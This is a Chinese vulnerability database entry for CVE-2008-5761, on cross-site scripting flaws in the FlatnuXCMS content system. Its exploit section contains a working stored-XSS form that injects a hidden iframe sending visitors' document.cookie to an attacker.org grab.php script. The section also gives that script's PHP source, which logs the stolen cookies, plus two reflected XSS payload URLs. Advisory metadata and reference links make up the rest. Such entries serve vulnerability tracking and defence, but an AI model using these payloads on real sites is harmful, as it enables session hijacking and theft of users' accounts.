Flatnux 'photo.php' Multiple 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184203 漏洞类型 跨站脚本
发布时间 2008-12-30 更新时间 2009-01-29
CVE编号 CVE-2008-5761 CNNVD-ID CNNVD-200812-484
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-484
|漏洞详情
FlatnuXCMS(又称Flatnuke3)2008-12-11中存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)对默认URI的mod参数;(2)对05_Foto模块中的photo.php的foto参数;或(3)对08_Filesmodule的index.php地一个插入操作中的命名参数,注入任意web脚本或HTML,例如对一个IFRAME元件中的SRC属性的注入。
|漏洞EXP
<!--
exploit flatnux grabber cookies visitor
site :http://www.speleoalex.altervista.org/flatnuke3/index.php
download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
author:gmda

Flatnux does not filter code html/javascript then you can injector in this way:

operation
1] register
2] make longin
3] use the HTML code below
-->
<html><head>
</head>
<body>
<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&amp;opmod=insertrecord" method="POST">
titolo*<input  size ="20"  style="visibility:hidden;" value="filex &lt;iframe  width=&quot;0&quot; height=&quot;0&quot; style=&quot;visibility:hidden;&quot; src=&quot;javascript:window.location=&apos;http://attacker.org/grab.php?cmd=&apos;+document.cookie;&quot;&gt;&lt;/iframe&gt;" name="name" type="text" /><br />
<textarea title="Inserisci qui la descrizione" cols="80"  rows="10"  name="description" style="visibility:hidden;" ></textarea><br />
Immagine<input  size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
File<input  size="20" name="file" type="file" style="visibility:hidden;" /><br />
<input type="submit" value="Zic">
</form>
</body></html>
<!-- grab.php
<?php $data = $_GET['cmd'];
$date=date("j F, Y, g:i a");
$referer=$_SERVER['HTTP_REFERER'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, $referer . " / " . $data."\n".$date."\n");
fclose($fh);
?>
-->

<!-- xss variables mod foto

/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E

-->

|参考资料

来源:XF
名称:flatnux-photo-xss(47369)
链接:http://xforce.iss.net/xforce/xfdb/47369
来源:XF
名称:flatnux-index-xss(47367)
链接:http://xforce.iss.net/xforce/xfdb/47367
来源:BID
名称:32828
链接:http://www.securityfocus.com/bid/32828
来源:BID
名称:32826
链接:http://www.securityfocus.com/bid/32826
来源:MILW0RM
名称:7461
链接:http://www.milw0rm.com/exploits/7461
来源:SREASON
名称:4825
链接:http://securityreason.com/securityalert/4825
来源:SECUNIA
名称:33175
链接:http://secunia.com/advisories/33175